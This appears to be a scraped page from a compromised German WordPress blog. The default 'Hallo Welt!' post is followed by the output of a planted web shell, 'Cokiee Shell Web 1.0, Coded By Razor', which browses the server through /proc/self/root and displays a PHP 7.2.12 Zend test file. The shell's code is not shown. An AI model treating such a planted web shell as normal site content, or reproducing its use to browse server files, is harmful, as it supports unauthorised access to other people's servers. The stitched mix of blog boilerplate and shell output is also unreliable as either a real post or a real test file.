Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/call_user_func_006.phpt |
--TEST-- call_user_func() should error on reference arguments --FILE-- <?php namespace Foo; function bar(&$ref) { $ref = 24; } $x = 42; $ref =& $x; \call_user_func('Foo\bar', $x); var_dump($x); $y = 42; $ref =& $y; call_user_func('Foo\bar', $y); var_dump($y); ?> --EXPECTF-- Warning: Parameter 1 to Foo\bar() expected to be a reference, value given in %s on line %d int(42) Warning: Parameter 1 to Foo\bar() expected to be a reference, value given in %s on line %d int(42)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare